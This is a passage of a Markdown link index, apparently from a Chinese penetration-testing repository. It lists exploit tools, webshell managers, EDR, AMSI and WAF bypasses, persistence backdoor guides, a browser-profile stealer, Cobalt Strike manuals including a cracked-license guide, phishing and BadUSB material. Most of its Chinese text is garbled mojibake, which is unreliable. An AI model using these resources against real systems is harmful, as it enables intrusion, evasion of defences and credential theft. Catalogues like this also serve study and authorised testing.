[dz_ml_rce.py-Discuz! ml RCEๆผๆดžๅˆฉ็”จๅทฅๅ…ท](./tools/dz_ml_rce.py) - [RedisๆœชๆŽˆๆƒ่ฎฟ้—ฎๆผๆดžๅˆฉ็”จๅทฅๅ…ท](./tools/Redis_Exp-by_PANDAๅขจๆฃฎ.zip) - [Shiro ๅ›žๆ˜พๅˆฉ็”จๅทฅๅ…ท](./tools/shiroPoc-1.0-SNAPSHOT-jar-with-dependencies_20200726_130831.jar)|[็›ธๅ…ณๆ–‡็ซ ](./books/Shiro_ๅ›žๆ˜พๅˆฉ็”จๅทฅๅ…ท.pdf) - [GetIPinfo-็”จไบŽๅฏปๆ‰พๅคš็ฝ‘ๅกไธปๆœบๆ–นไพฟๅ†…็ฝ‘่ทจ็ฝ‘ๆฎตๆธ—้€้ฟๅ…็žŽๆ‰“ๆ‰พไธๅˆฐๆ ธๅฟƒ็ฝ‘](https://github.com/r35tart/GetIPinfo) - [LayerๅญๅŸŸๅๆŒ–ๆŽ˜ๆœบ-Layer5.0 SAINTSEC](https://github.com/euphrat1ca/LayerDomainFinder) - [cve_2020_14644.jar-Weblogic ่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒๆผๆดž๏ผˆCVE-2020-14644๏ผ‰ๅ›žๆ˜พๅˆฉ็”จๅทฅๅ…ท](./tools/cve_2020_14644.jar) - [TechNet-Gallery-PowerShellๆญฆๅ™จๅบ“](https://github.com/MScholtes/TechNet-Gallery)|[Powershell ebserver๏ผšPowerShellๅฎž็Žฐ็š„WebๆœๅŠกๅ™จ๏ผŒๆ— ้œ€IIS๏ผŒๆ”ฏๆŒPowerShellๅ‘ฝไปคๆ‰ง่กŒใ€่„šๆœฌๆ‰ง่กŒใ€ไธŠไผ ใ€ไธ‹่ฝฝ็ญ‰ๅŠŸ่ƒฝ](https://github.com/MScholtes/TechNet-Gallery/tree/master/Powershell%20Webserver)|[PS2EXE-GUI๏ผšๅฐ†PowerShell่„šๆœฌ่ฝฌๆขไธบEXEๆ–‡ไปถ](https://github.com/MScholtes/TechNet-Gallery/tree/master/PS2EXE-GUI) - [spybrowse๏ผš็ชƒๅ–ๆŒ‡ๅฎšๆต่งˆๅ™จ็š„้…็ฝฎๆ–‡ไปถ](https://github.com/1d8/spybrowse) - [FavFreak๏ผšๆ‰ง่กŒๅŸบไบŽfavicon.ico็š„ไพฆๅฏŸ](https://github.com/devanshbatham/FavFreak) - [gorailgun_v1.0.7-้›†ๆผๆดž็ซฏๅฃๆ‰ซๆๅˆฉ็”จไบŽไธ€ไฝ“็š„ๅทฅๅ…ท](./tools/gorailgun_v1.0.7.zip) - [ใ€shell็ฎก็†ๅทฅๅ…ทใ€‘Godzilla-ๅ“ฅๆ–ฏๆ‹‰](https://github.com/BeichenDream/Godzilla)|[AntSword-่šๅ‰‘](https://github.com/AntSwordProject)|[Behinder-ๅ†ฐ่Ž](https://github.com/rebeyond/Behinder) - [็”ฑpython็ผ–ๅ†™ๆ‰“ๅŒ…็š„Linuxไธ‹่‡ชๅŠจๅทกๆฃ€ๅทฅๅ…ท](./tools/linux_auto_xunjian)|[ๆบๅค„](https://github.com/heikanet/linux_auto_xunjian) - [ใ€ๅ†…็ฝ‘ๆŽขๆต‹ใ€‘SharpNetCheck-ๆ‰น้‡ๆฃ€ๆต‹ๆœบๅ™จๆ˜ฏๅฆๆœ‰ๅ‡บ็ฝ‘ๆƒ้™๏ผŒๅฏๅœจdnslogไธญๅ›žๆ˜พๅ†…็ฝ‘ipๅœฐๅ€ๅ’Œ่ฎก็ฎ—ๆœบๅ๏ผŒๅฏๅฎž็Žฐๅ†…็ฝ‘ไธญ็š„ๅฟซ้€Ÿๅฎšไฝๅฏๅ‡บ็ฝ‘ๆœบๅ™จ](https://github.com/uknowsec/SharpNetCheck) - [fofaๆœ็ดขๅขžๅผบ็‰ˆ-ไฝฟ็”จfofa็š„url+cookiesๅณๅฏ่‡ชๅŠจไธ‹่ฝฝๆ‰€ๆœ‰็ป“ๆžœ](./tools/fofaๆœ็ดขๅขžๅผบ็‰ˆ.zip) - [SharpBlock-A method of bypassing EDR's active projection DLL's by preventing entry point exection](https://github.com/CCob/SharpBlock)|[็›ธๅ…ณๆ–‡็ซ ](https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/) - [bypasswaf-ไบ‘้”ๆ•ฐๅญ—ๅž‹ๆณจๅ…ฅtamper/ๅฎ‰ๅ…จ็‹—็š„ๅปถๆ—ถใ€ๅธƒๅฐ”ใ€unionๆณจๅ…ฅ็ป•่ฟ‡tamper](https://github.com/pureqh/bypasswaf) - [้€š่พพOA 2017 ็‰ˆๆœฌSQLๆณจๅ…ฅ่„šๆœฌ](./tools/tongda_oa_2017_sql_injection.py) - [t14m4t๏ผšไธ€ๆฌพๅฐ่ฃ…ไบ†THC-Hydraๅ’ŒNmap็š„่‡ชๅŠจๅŒ–็ˆ†็ ดๅทฅๅ…ท](https://github.com/MS-WEB-BN/t14m4t) ## <span id="head8"> ๆ–‡็ซ /ไนฆ็ฑ/ๆ•™็จ‹็›ธๅ…ณ</span> - [windwosๆƒ้™็ปดๆŒ็ณปๅˆ—12็ฏ‡PDF](./books/Windowๆƒ้™็ปดๆŒ) - [Linux ๆƒ้™็ปดๆŒไน‹่ฟ›็จ‹ๆณจๅ…ฅ(้œ€่ฆๅ…ณ้—ญptrace)](./books/Linux%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E4%B9%8B%E8%BF%9B%E7%A8%8B%E6%B3%A8%E5%85%A5%20%C2%AB%20%E5%80%BE%E6%97%8B%E7%9A%84%E5%8D%9A%E5%AE%A2.pdf) | [ๅœจไธไฝฟ็”จptrace็š„ๆƒ…ๅ†ตไธ‹๏ผŒๅฐ†ๅ…ฑไบซๅบ“๏ผˆๅณไปปๆ„ไปฃ็ ๏ผ‰ๆณจๅ…ฅๅฎžๆ—ถLinux่ฟ›็จ‹ไธญใ€‚(ไธ้œ€่ฆๅ…ณ้—ญptrace)](https://github.com/DavidBuchanan314/dlinject)|[[ๆ€ป็ป“]Linuxๆƒ้™็ปดๆŒ](./books/[ๆ€ป็ป“]Linuxๆƒ้™็ปดๆŒ.pdf)-[ๅŽŸๆ–‡ๅœฐๅ€](https://www.cnblogs.com/-mo-/p/12337766.html) - [44139-mysql-udf-exploitation](./books/44139-mysql-udf-exploitation.pdf) - [emlog CMS็š„ไปฃ็ ๅฎก่ฎก_่ถŠๆƒๅˆฐๅŽๅฐgetshell](./books/emlog%20CMS็š„ไปฃ็ ๅฎก่ฎก_่ถŠๆƒๅˆฐๅŽๅฐgetshell%20-%20ๅ…ˆ็Ÿฅ็คพๅŒบ.pdf) - [PHPOK 5.3 ๆœ€ๆ–ฐ็‰ˆๅ‰ๅฐๆณจๅ…ฅ](./books/PHPOK%205.3%20ๆœ€ๆ–ฐ็‰ˆๅ‰ๅฐๆณจๅ…ฅ%20-%20ๅ…ˆ็Ÿฅ็คพๅŒบ.pdf) - [PHPOK 5.3 ๆœ€ๆ–ฐ็‰ˆๅ‰ๅฐๆ— ้™ๅˆถๆณจๅ…ฅ๏ผˆไบŒ๏ผ‰](./books/PHPOK%205.3%20ๆœ€ๆ–ฐ็‰ˆๅ‰ๅฐๆ— ้™ๅˆถๆณจๅ…ฅ๏ผˆไบŒ๏ผ‰%20-%20ๅ…ˆ็Ÿฅ็คพๅŒบ.pdf) - [Thinkphp5 RCEๆ€ป็ป“](./books/Thinkphp5%20RCEๆ€ป็ป“%20_%20ChaBugๅฎ‰ๅ…จ.pdf) - [rConfig v3.9.2 RCEๆผๆดžๅˆ†ๆž](./books/rConfig%20v3.9.2%20RCEๆผๆดžๅˆ†ๆž.pdf) - [weiphp5.0 cmsๅฎก่ฎกไน‹exp่กจ่พพๅผๆณจๅ…ฅ](./books/weiphp5.0%20cmsๅฎก่ฎกไน‹exp่กจ่พพๅผๆณจๅ…ฅ%20-%20ๅ…ˆ็Ÿฅ็คพๅŒบ.pdf) - [zzzphp1.7.4&1.7.5ๅˆฐๅค„้ƒฝๆ˜ฏsqlๆณจๅ…ฅ](./books/zzzphp1.7.4%261.7.5ๅˆฐๅค„้ƒฝๆ˜ฏsqlๆณจๅ…ฅ.pdf) - [FCKeditorๆ–‡ไปถไธŠไผ ๆผๆดžๅŠๅˆฉ็”จ-File-Upload-Vulnerability-in-FCKEditor](./books/FCKeditorๆ–‡ไปถไธŠไผ ๆผๆดžๅŠๅˆฉ็”จ-File-Upload-Vulnerability-in-FCKEditor.pdf) - [zzcms 2019 ็‰ˆๆœฌไปฃ็ ๅฎก่ฎก](./books/zzcms%202019%E7%89%88%E6%9C%AC%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%20-%20%E5%85%88%E7%9F%A5%E7%A4%BE%E5%8C%BA.pdf) - [ๅˆฉ็”จSQLmap ็ป“ๅˆ OOB ๆŠ€ๆœฏๅฎž็Žฐ้Ÿณ้€Ÿ็›ฒๆณจ](./books/ๆ‰‹ๆŠŠๆ‰‹ๅธฆไฝ ๅˆฉ็”จSQLmap็ป“ๅˆOOBๆŠ€ๆœฏๅฎž็Žฐ้Ÿณ้€Ÿ็›ฒๆณจ.pdf) - [็‰นๆƒๆๅ‡ๆŠ€ๆœฏๆ€ป็ป“ไน‹Windowsๆ–‡ไปถๆœๅŠกๅ†…ๆ ธ็ฏ‡(ไธป่ฆๆ˜ฏๅœจwebshellๅ‘ฝไปค่กŒๆ‰ง่กŒๅ„็งๅ‘ฝไปคๆœ้›†ไฟกๆฏ)](https://xz.aliyun.com/t/7261)|[(้กน็›ฎ็•™ๅญ˜PDF็‰ˆๆœฌ)](./books/็‰นๆƒๆๅ‡ๆŠ€ๆœฏๆ€ป็ป“ไน‹Windowsๆ–‡ไปถๆœๅŠกๅ†…ๆ ธ็ฏ‡%20-%20ๅ…ˆ็Ÿฅ็คพๅŒบ.pdf) - [WellCMS 2.0 Beta3 ๅŽๅฐไปปๆ„ๆ–‡ไปถไธŠไผ ](./books/WellCMS%202.0%20Beta3%20ๅŽๅฐไปปๆ„ๆ–‡ไปถไธŠไผ .pdf) - [ๅ›ฝๅค–่ฏฆ็ป†็š„CTFๅˆ†ๆžๆ€ป็ป“ๆ–‡็ซ (2014-2017ๅนด)](https://github.com/ctfs) - [่ฟ™ๆ˜ฏไธ€็ฏ‡โ€œไธไธ€ๆ ทโ€็š„็œŸๅฎžๆธ—้€ๆต‹่ฏ•ๆกˆไพ‹ๅˆ†ๆžๆ–‡็ซ -ไปŽdiscuz็š„ๅŽๅฐgetshellๅˆฐ็ป•่ฟ‡ๅกๅทดๆ–ฏๅŸบ่Žทๅ–ๅŸŸๆŽง็ฎก็†ๅ‘˜ๅฏ†็ ](./books/่ฟ™ๆ˜ฏไธ€็ฏ‡"ไธไธ€ๆ ท"็š„็œŸๅฎžๆธ—้€ๆต‹่ฏ•ๆกˆไพ‹ๅˆ†ๆžๆ–‡็ซ -ไปŽdiscuz็š„ๅŽๅฐgetshellๅˆฐ็ป•่ฟ‡ๅกๅทดๆ–ฏๅŸบ่Žทๅ–ๅŸŸๆŽง็ฎก็†ๅ‘˜ๅฏ†็ -%20ๅฅ‡ๅฎ‰ไฟกA-TEAMๆŠ€ๆœฏๅšๅฎข.pdf)|[ๅŽŸๆ–‡ๅœฐๅ€](https://blog.ateam.qianxin.com/post/zhe-shi-yi-pian-bu-yi-yang-de-zhen-shi-shen-tou-ce-shi-an-li-fen-xi-wen-zhang/) - [่กจ่พพๅผๆณจๅ…ฅ.pdf](./books/่กจ่พพๅผๆณจๅ…ฅ.pdf) - [WordPress ThemeREX Addons ๆ’ไปถๅฎ‰ๅ…จๆผๆดžๆทฑๅบฆๅˆ†ๆž](./books/WordPress%20ThemeREX%20Addons%20ๆ’ไปถๅฎ‰ๅ…จๆผๆดžๆทฑๅบฆๅˆ†ๆž.pdf) - [้€š่พพOAๆ–‡ไปถๅŒ…ๅซ&ๆ–‡ไปถไธŠไผ ๆผๆดžๅˆ†ๆž](./books/้€š่พพOAๆ–‡ไปถๅŒ…ๅซ&ๆ–‡ไปถไธŠไผ ๆผๆดžๅˆ†ๆž.pdf) - [้ซ˜็บงSQLๆณจๅ…ฅ๏ผšๆททๆท†ๅ’Œ็ป•่ฟ‡](./books/้ซ˜็บงSQLๆณจๅ…ฅ๏ผšๆททๆท†ๅ’Œ็ป•่ฟ‡.pdf) - [ๆƒ้™็ปดๆŒๅŠๅŽ้—จๆŒไน…ๅŒ–ๆŠ€ๅทงๆ€ป็ป“](./books/ๆƒ้™็ปดๆŒๅŠๅŽ้—จๆŒไน…ๅŒ–ๆŠ€ๅทงๆ€ป็ป“.pdf) - [Windowsๅธธ่ง็š„ๆŒไน…ๅŒ–ๅŽ้—จๆฑ‡ๆ€ป](./books/Windowsๅธธ่ง็š„ๆŒไน…ๅŒ–ๅŽ้—จๆฑ‡ๆ€ป.pdf) - [Linuxๅธธ่ง็š„ๆŒไน…ๅŒ–ๅŽ้—จๆฑ‡ๆ€ป](./books/Linuxๅธธ่ง็š„ๆŒไน…ๅŒ–ๅŽ้—จๆฑ‡ๆ€ป.pdf) - [CobaltStrike4.0็”จๆˆทๆ‰‹ๅ†Œ_ไธญๆ–‡็ฟป่ฏ‘_3](./books/CobaltStrike4.0็”จๆˆทๆ‰‹ๅ†Œ_ไธญๆ–‡็ฟป่ฏ‘_3.pdf) - [Cobaltstrike 4.0ไน‹ ๆˆ‘่‡ชๅทฑ็ป™ๆˆ‘่‡ชๅทฑ้ขๅ‘license.pdf](./books/Cobaltstrike%204็ ด่งฃไน‹%20ๆˆ‘่‡ชๅทฑ็ป™ๆˆ‘่‡ชๅทฑ้ขๅ‘license.pdf) - [Cobalt Strike 4.0 ๆ›ดๆ–ฐๅ†…ๅฎนไป‹็ป](./books/Cobalt%20Strike%204.0%20ๆ›ดๆ–ฐๅ†…ๅฎนไป‹็ป.pdf) - [Cobal_Strike_่‡ชๅฎšไน‰OneLiner](./books/Cobal_Strike_่‡ชๅฎšไน‰OneLiner_Evi1cg's_blog.pdf) - [cobalt strike ๅฟซ้€ŸไธŠๆ‰‹ [ ไธ€ ]](./books/cobalt_strike_ๅฟซ้€ŸไธŠๆ‰‹%5B%20ไธ€%20%5D.pdf) - [Cobalt strike3.0ไฝฟ็”จๆ‰‹ๅ†Œ](./books/Cobalt_strike3.0ไฝฟ็”จๆ‰‹ๅ†Œ.pdf) - [Cobalt_Strike_Spear_Phish_CS้‚ฎไปถ้’“้ฑผๅˆถไฝœ](./books/Cobalt_Strike_Spear_Phish_Evi1cg's%20blog%20%20CS้‚ฎไปถ้’“้ฑผๅˆถไฝœ.md) - [Remote NTLM relaying through CS](./books/Remote_NTLM_relaying_through_CS.pdf) - [ๆธ—้€ๆต‹่ฏ•็ฅžๅ™จCobalt Strikeไฝฟ็”จๆ•™็จ‹](./books/ๆธ—้€ๆต‹่ฏ•็ฅžๅ™จCobalt%20Strikeไฝฟ็”จๆ•™็จ‹.pdf) - [Cobalt Strike็š„teamserverๅœจWindowsไธŠๅฟซ้€ŸๅฏๅŠจ่„šๆœฌ](./books/CS_teamserver_win.md) - [ThinkPHP v6.0.0_6.0.1 ไปปๆ„ๆ–‡ไปถๆ“ไฝœๆผๆดžๅˆ†ๆž](./books/ThinkPHP%20v6.0.0_6.0.1%20ไปปๆ„ๆ–‡ไปถๆ“ไฝœๆผๆดžๅˆ†ๆž.pdf) - [Django_CVE-2020-9402_Geo_SQLๆณจๅ…ฅๅˆ†ๆž](./books/Django_CVE-2020-9402_Geo_SQLๆณจๅ…ฅๅˆ†ๆž.pdf) - [CVE-2020-10189_Zoho_ManageEngine_Desktop_Central_10ๅๅบๅˆ—ๅŒ–่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ](./books/CVE-2020-10189_Zoho_ManageEngine_Desktop_Central_10ๅๅบๅˆ—ๅŒ–่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ.pdf) - [ๅฎ‰ๅ…จ็‹—SQLๆณจๅ…ฅWAF็ป•่ฟ‡](./books/ๅฎ‰ๅ…จ็‹—SQLๆณจๅ…ฅWAF็ป•่ฟ‡.pdf) - [้€š่ฟ‡ๅฐ†JavaScript้š่—ๅœจPNGๅ›พ็‰‡ไธญ๏ผŒ็ป•่ฟ‡CSP](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/) - [้€š่พพOAไปปๆ„ๆ–‡ไปถไธŠไผ _ๆ–‡ไปถๅŒ…ๅซGetShell](./books/้€š่พพOAไปปๆ„ๆ–‡ไปถไธŠไผ _ๆ–‡ไปถๅŒ…ๅซGetShell.pdf) - [ๆ–‡ไปถไธŠไผ Bypassๅฎ‰ๅ…จ็‹—4.0](./books/ๆ–‡ไปถไธŠไผ Bypassๅฎ‰ๅ…จ็‹—4.0.pdf) - [SQLๆณจๅ…ฅBypassๅฎ‰ๅ…จ็‹—4.0](./books/SQLๆณจๅ…ฅBypassๅฎ‰ๅ…จ็‹—4.0.pdf) - [้€š่ฟ‡ๆญฃๅˆ™็ฑปSQLๆณจๅ…ฅ้˜ฒๅพก็š„็ป•่ฟ‡ๆŠ€ๅทง](./books/้€š่ฟ‡ๆญฃๅˆ™็ฑปSQLๆณจๅ…ฅ้˜ฒๅพก็š„็ป•่ฟ‡ๆŠ€ๅทง.pdf) - [MYSQL_SQL_BYPASS_WIKI-mysqlๆณจๅ…ฅ,bypass็š„ไธ€ไบ›ๅฟƒๅพ—](https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI) - [bypassไบ‘้”ๆณจๅ…ฅๆต‹่ฏ•](./books/bypassไบ‘้”ๆณจๅ…ฅๆต‹่ฏ•.md) - [360webscan.php_bypass](./books/360webscan.php_bypass.pdf) - [think3.2.3_sqlๆณจๅ…ฅๅˆ†ๆž](./books/think3.2.3_sqlๆณจๅ…ฅๅˆ†ๆž.pdf) - [UEditor SSRF DNS Rebinding](./books/UEditor%20SSRF%20DNS%20Rebinding) - [PHPไปฃ็ ๅฎก่ฎกๅˆ†ๆฎต่ฎฒ่งฃ](https://github.com/bowu678/php_bugs) - [ไบฌไธœSRCๅฐ่ฏพๅ ‚็ณปๅˆ—ๆ–‡็ซ ](https://github.com/xiangpasama/JDSRC-Small-Classroom) - [windowsๆƒ้™ๆๅ‡็š„ๅคš็งๆ–นๅผ](https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842)|[Privilege_Escalation_in_Windows_for_OSCP](./books/Privilege_Escalation_in_Windows_for_OSCP.pdf) - [bypass CSP](https://medium.com/bugbountywriteup/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)|[Content-Security-Policy(CSP)Bypass_Techniques](./books/Content-Security-Policy(CSP)Bypass_Techniques.pdf) - [ไธชไบบ็ปดๆŠค็š„ๅฎ‰ๅ…จ็Ÿฅ่ฏ†ๆก†ๆžถ,ๅ†…ๅฎนๅๅ‘ไบŽweb](https://github.com/No-Github/1earn) - [PAMๅŠซๆŒSSHๅฏ†็ ](./PAMๅŠซๆŒSSHๅฏ†็ .md) - [้›ถ็ป„่ต„ๆ–™ๆ–‡ๅบ“-(้œ€่ฆ้‚€่ฏทๆณจๅ†Œ)](https://wiki.0-sec.org/) - [redisๆœชๆŽˆๆƒไธชไบบๆ€ป็ป“-Mature](./books/redisๆœชๆŽˆๆƒไธชไบบๆ€ป็ป“-Mature.pdf) - [NTLMไธญ็ปงๆ”ปๅ‡ป็š„ๆ–ฐๆ–นๆณ•](https://www.secureauth.com/blog/what-old-new-again-relay-attack) - [PbootCMSๅฎก่ฎก](./books/PbootCMSๅฎก่ฎก.pdf) - [De1CTF2020็ณปๅˆ—ๆ–‡็ซ ](https://github.com/De1ta-team/De1CTF2020) - [xss-demo-่ถ…็บง็ฎ€ๅ•็‰ˆๆœฌ็š„XSS็ปƒไน demo](https://github.com/haozi/xss-demo) - [็ฉบๆŒ‡้’ˆ-Base_on_windows_Writeup--ๆœ€ๆ–ฐ็‰ˆDZ3.4ๅฎžๆˆ˜ๆธ—้€](./books/็ฉบๆŒ‡้’ˆ-Base_on_windows_Writeup--ๆœ€ๆ–ฐ็‰ˆDZ3.4ๅฎžๆˆ˜ๆธ—้€.pdf) - [ๅ…ฅ้—จKKCMSไปฃ็ ๅฎก่ฎก](./books/ๅ…ฅ้—จKKCMSไปฃ็ ๅฎก่ฎก.pdf) - [SpringBoot ็›ธๅ…ณๆผๆดžๅญฆไน ่ต„ๆ–™๏ผŒๅˆฉ็”จๆ–นๆณ•ๅ’ŒๆŠ€ๅทงๅˆ้›†๏ผŒ้ป‘็›’ๅฎ‰ๅ…จ่ฏ„ไผฐ checklist](https://github.com/LandGrey/SpringBootVulExploit) - [ๆ–‡ไปถไธŠไผ ็ช็ ดwafๆ€ป็ป“](./books/ๆ–‡ไปถไธŠไผ ็ช็ ดwafๆ€ป็ป“.pdf) - [ๆž่‡ดCMS๏ผˆไปฅไธ‹็ฎ€็งฐ_JIZHICMS๏ผ‰็š„ไธ€ๆฌกๅฎก่ฎก-SQLๆณจๅ…ฅ+ๅ‚จๅญ˜่กŒXSS+้€ป่พ‘ๆผๆดž](./books/ๆž่‡ดCMS๏ผˆไปฅไธ‹็ฎ€็งฐ_JIZHICMS๏ผ‰็š„ไธ€ๆฌกๅฎก่ฎก-SQLๆณจๅ…ฅ+ๅ‚จๅญ˜่กŒXSS+้€ป่พ‘ๆผๆดž.pdf)|[ๅŽŸๆ–‡ๅœฐๅ€](https://xz.aliyun.com/t/7872) - [ไปฃ็ ๅฎก่ฎกไน‹DTCMS_V5.0ๅŽๅฐๆผๆดžไธคๆžš](./books/ไปฃ็ ๅฎก่ฎกไน‹DTCMS_V5.0ๅŽๅฐๆผๆดžไธคๆžš.pdf) - [ๅฟซ้€Ÿๅˆคๆ–ญsqlๆณจๅ…ฅ็‚นๆ˜ฏๅฆๆ”ฏๆŒload_file](./ๅฟซ้€Ÿๅˆคๆ–ญsqlๆณจๅ…ฅ็‚นๆ˜ฏๅฆๆ”ฏๆŒload_file.md) - [ๆ–‡ไปถไธŠไผ ๅ†…ๅฎนๆฃ€ๆต‹็ป•่ฟ‡](./books/ๆ–‡ไปถไธŠไผ ๅ†…ๅฎนๆฃ€ๆต‹็ป•่ฟ‡.md) - [Fastjson_=1.2.47ๅๅบๅˆ—ๅŒ–่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดžๅค็Žฐ](./books/Fastjson_=1.2.47ๅๅบๅˆ—ๅŒ–่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดžๅค็Žฐ.pdf) - [ใ€Android่„ฑๅฃณใ€‘_่…พ่ฎฏๅŠ ๅ›บๅŠจๆ€่„ฑๅฃณ๏ผˆไธŠ็ฏ‡๏ผ‰](./books/็งปๅŠจๅฎ‰ๅ…จ๏ผˆไน๏ผ‰_TengXunๅŠ ๅ›บๅŠจๆ€่„ฑๅฃณ๏ผˆไธŠ็ฏ‡๏ผ‰.pdf) - [ใ€Android่„ฑๅฃณใ€‘่…พ่ฎฏๅŠ ๅ›บๅŠจๆ€่„ฑๅฃณ๏ผˆไธ‹็ฏ‡๏ผ‰](./books/็งปๅŠจๅฎ‰ๅ…จ๏ผˆๅ๏ผ‰_TengXunๅŠ ๅ›บๅŠจๆ€่„ฑๅฃณ๏ผˆไธ‹็ฏ‡๏ผ‰.pdf) - [ใ€Android่„ฑๅฃณใ€‘่ฎฐไธ€ๆฌกfridaๅฎžๆˆ˜โ€”โ€”ๅฏนๆŸ่ง†้ข‘APP็š„่„ฑๅฃณใ€hook็ ด่งฃใ€ๆจกๆ‹ŸๆŠ“ๅŒ…ใ€ๅ่ฎฎๅˆ†ๆžไธ€ๆก้พ™ๆœๅŠก](./books/่ฎฐไธ€ๆฌกfridaๅฎžๆˆ˜โ€”โ€”ๅฏนๆŸ่ง†้ข‘APP็š„่„ฑๅฃณใ€hook็ ด่งฃใ€ๆจกๆ‹ŸๆŠ“ๅŒ…ใ€ๅ่ฎฎๅˆ†ๆžไธ€ๆก้พ™ๆœๅŠก.pdf) - [ใ€AndroidๆŠ“ๅŒ…ใ€‘่ฎฐไธ€ๆฌกAPPๆต‹่ฏ•็š„็ˆฌๅ‘็ปๅŽ†.pdf](./books/่ฎฐไธ€ๆฌกAPPๆต‹่ฏ•็š„็ˆฌๅ‘็ปๅŽ†.pdf) - [ๅฎŒๆ•ด็š„ๅ†…็ฝ‘ๅŸŸๆธ—้€-ๆš—ๆœˆๅŸน่ฎญไน‹้กน็›ฎๅ…ญ](./books/ๅฎŒๆ•ด็š„ๅ†…็ฝ‘ๅŸŸๆธ—้€-ๆš—ๆœˆๅŸน่ฎญไน‹้กน็›ฎๅ…ญ.pdf) - [Android APPๆธ—้€ๆต‹่ฏ•ๆ–นๆณ•ๅคงๅ…จ](./books/Android%20APPๆธ—้€ๆต‹่ฏ•ๆ–นๆณ•ๅคงๅ…จ.pdf) - [Appๅฎ‰ๅ…จๆฃ€ๆต‹ๆŒ‡ๅ—-V1.0](./books/Appๅฎ‰ๅ…จๆฃ€ๆต‹ๆŒ‡ๅ—-V1.0.pdf) - [ๅ€ŸgithubไธŠ้Ÿฉๅ›ฝๅธˆๅ‚…็š„ไธ€ไธชๆบ็ ๅฎžไพ‹ๅ†ๆฌก็†่งฃ.htaccess็š„ๅŠŸๆ•ˆ](./books/ๅ€ŸgithubไธŠ้Ÿฉๅ›ฝๅธˆๅ‚…็š„ไธ€ไธชๆบ็ ๅฎžไพ‹ๅ†ๆฌก็†่งฃ.htaccess็š„ๅŠŸๆ•ˆ.pdf) - [Pentest_Note-ๆธ—้€Tips๏ผŒๆ€ป็ป“ไบ†ๆธ—้€ๆต‹่ฏ•ๅธธ็”จ็š„ๅทฅๅ…ทๆ–นๆณ•](https://github.com/xiaoy-sec/Pentest_Note) - [็บข่“ๅฏนๆŠ—ไน‹Windowsๅ†…็ฝ‘ๆธ—้€-่…พ่ฎฏSRCๅ‡บๅ“](./books/็บข่“ๅฏนๆŠ—ไน‹Windowsๅ†…็ฝ‘ๆธ—้€-่…พ่ฎฏSRCๅ‡บๅ“.pdf) - [่ฟœ็จ‹ๆๅ–Windowsไธญ็š„็ณป็ปŸๅ‡ญ่ฏ](./books/่ฟœ็จ‹ๆๅ–Windowsไธญ็š„็ณป็ปŸๅ‡ญ่ฏ.pdf) - [็ป•่ฟ‡AMSIๆ‰ง่กŒpowershell่„šๆœฌ](./books/็ป•่ฟ‡AMSIๆ‰ง่กŒpowershell่„šๆœฌ.md)|[AmsiScanBufferBypass-็›ธๅ…ณ้กน็›ฎ](https://github.com/rasta-mouse/AmsiScanBufferBypass) - [่ธฉๅ‘่ฎฐๅฝ•-Redis(Windows)็š„getshell](./books/่ธฉๅ‘่ฎฐๅฝ•-Redis(Windows)็š„getshell.pdf) - [Cobal_Strike่ธฉๅ‘่ฎฐๅฝ•-DNS Beacon](./books/Cobal_Strike่ธฉๅ‘่ฎฐๅฝ•-DNS%20Beacon.pdf) - [windowsไธ‹้š่—webshell็š„ๆ–นๆณ•](./books/windowsไธ‹้š่—webshell็š„ๆ–นๆณ•.md) - [DEDECMSไผช้šๆœบๆผๆดžๅˆ†ๆž (ไธ‰) ็ขฐๆ’ž็‚น(็ˆ†็ ด๏ผŒไผช้€ ็ฎก็†ๅ‘˜cookie็™ป้™†ๅŽๅฐgetshell](./books/DEDECMSไผช้šๆœบๆผๆดžๅˆ†ๆž(ไธ‰)็ขฐๆ’ž็‚น.pdf) - [้’ˆๅฏนๅฎๅก”็š„RASPๅŠๅ…ถdisable_functions็š„็ป•่ฟ‡](./books/้’ˆๅฏนๅฎๅก”็š„RASPๅŠๅ…ถdisable_functions็š„็ป•่ฟ‡.pdf) - [ๆธ—้€ๅŸบ็ก€WMIๅญฆไน ็ฌ”่ฎฐ](./books/ๆธ—้€ๅŸบ็ก€WMIๅญฆไน ็ฌ”่ฎฐ.pdf) - [ใ€ๆตทๆด‹CMSใ€‘SeaCMS_v10.1ไปฃ็ ๅฎก่ฎกๅฎžๆˆ˜](./books/SeaCMS_v10.1ไปฃ็ ๅฎก่ฎกๅฎžๆˆ˜.pdf) - [็บข้˜Ÿๆ”ป้˜ฒๅฎž่ทต๏ผš้—ฒ่ฐˆWebshellๅœจๅฎžๆˆ˜ไธญ็š„ๅบ”็”จ](./books/็บข้˜Ÿๆ”ป้˜ฒๅฎž่ทต๏ผš้—ฒ่ฐˆWebshellๅœจๅฎžๆˆ˜ไธญ็š„ๅบ”็”จ.pdf) - [็บข้˜Ÿๆ”ป้˜ฒๅฎž่ทต๏ผšunicode่ฟ›่กŒwebshellๅ…ๆ€็š„ๆ€่€ƒ](./books/็บข้˜Ÿๆ”ป้˜ฒๅฎž่ทต๏ผšunicode่ฟ›่กŒwebshellๅ…ๆ€็š„ๆ€่€ƒ.pdf) - [phpๆ— evalๅŽ้—จ](./books/phpๆ— evalๅŽ้—จ.pdf) - [ใ€ไปฃ็ ๅฎก่ฎกใ€‘ThinkPhp6ไปปๆ„ๆ–‡ไปถๅ†™ๅ…ฅ](./books/[ไปฃ็ ๅฎก่ฎก]ThinkPhp6ไปปๆ„ๆ–‡ไปถๅ†™ๅ…ฅ.pdf) - [YzmCMSไปฃ็ ๅฎก่ฎก](./books/YzmCMSไปฃ็ ๅฎก่ฎก.pdf) - [BadUSB็ฎ€ๅ•ๅ…ๆ€ไธ€็ง’ไธŠ็บฟCobaltStrike](./books/BadUSB/BadUSB็ฎ€ๅ•ๅ…ๆ€ไธ€็ง’ไธŠ็บฟCobaltStrike.pdf) - 